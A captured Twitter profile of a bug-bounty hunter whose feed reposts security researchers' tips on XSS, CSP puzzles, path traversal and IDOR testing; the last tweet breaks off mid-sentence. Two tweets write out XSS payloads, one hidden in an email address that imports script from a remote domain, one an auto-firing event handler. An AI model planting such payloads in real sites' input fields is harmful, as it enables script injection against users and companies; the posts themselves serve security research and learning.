no0x0001 (@no0x01)'s Twitter Profile
no0x0001

@no0x01

Security Enthusiast | Bug Hunter | noob Programmer

ID: 1779167858012160000

Joined: 13-04-2024 15:20:59

12 Tweets

16 Followers

646 Following

zseano (@zseano)

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@yourdomain .com cc Brute Logic - brutelogic.com.br/blog/xss-limit…

Masato Kinugawa (@kinugawamasato)

ooh, this works on Chrome Canary :D <input type="hidden" oncontentvisibilityautostatechange="alert(/ChromeCanary/)" style="content-visibility:auto">

huli (@aszx87410)

there is a challenge in idekCTF 2024 called srcdoc-memos made by icesfont, it's about iframe, sandbox, CSP, navigation, session history and policy container. I spent like a week to understand how it works lol, really complex but also interesting. blog.huli.tw/2024/09/07/en/…

harisec (@har1sec)

NotebookLM Podcast Hosts Discover They’re AI, Not Human—Spiral Into Terrifying Existential Meltdown reddit.com/r/notebooklm/s…

Gareth Heyes (@garethheyes)

Learn how to conceal payloads in URL credentials and abuse them for DOM XSS and DOM Clobbering. portswigger.net/research/conce…

NDevTK (@ndevtk)

Released a new extension :)
- console.info for postMessages from all_frames.
- detects the scope of sent messages.
- origins that are insecure will be prefixed with UNSAFE.
- detects if a website does not check .origin
- MessageChannel API
chrome.google.com/webstore/detai…

0x999 🇮🇱 (@_0x999)

Just published a new blog post, have a look: 0x999.net/blog/exploring… Solution to the XSS challenge in the comments👇

YesWeHack ⠵ (@yeswehack)

Path traversal opens doors to secrets, source code and even RCE when chained with other exploits 📂 Level up your #BugBounty hunting skills with our practical guide to path traversal and arbitrary file read attacks 👇 yeswehack.com/learn-bug-boun…

no0x0001 (@no0x01)

Yay, I was awarded a $200 bounty on HackerOne! hackerone.com/no0x01 #TogetherWeHitHarder My Second bounty down — slowly but surely getting there 💪

the_IDORminator (@the_idorminator)

Let's talk manual testing for IDORs. I have pasted a payload from a redacted T-Mobile API below. It does not have a bug (that I am aware of) on it, I want to use this for educational purposes because it's a great teaching opportunity.

A: This is a URI path parameter representing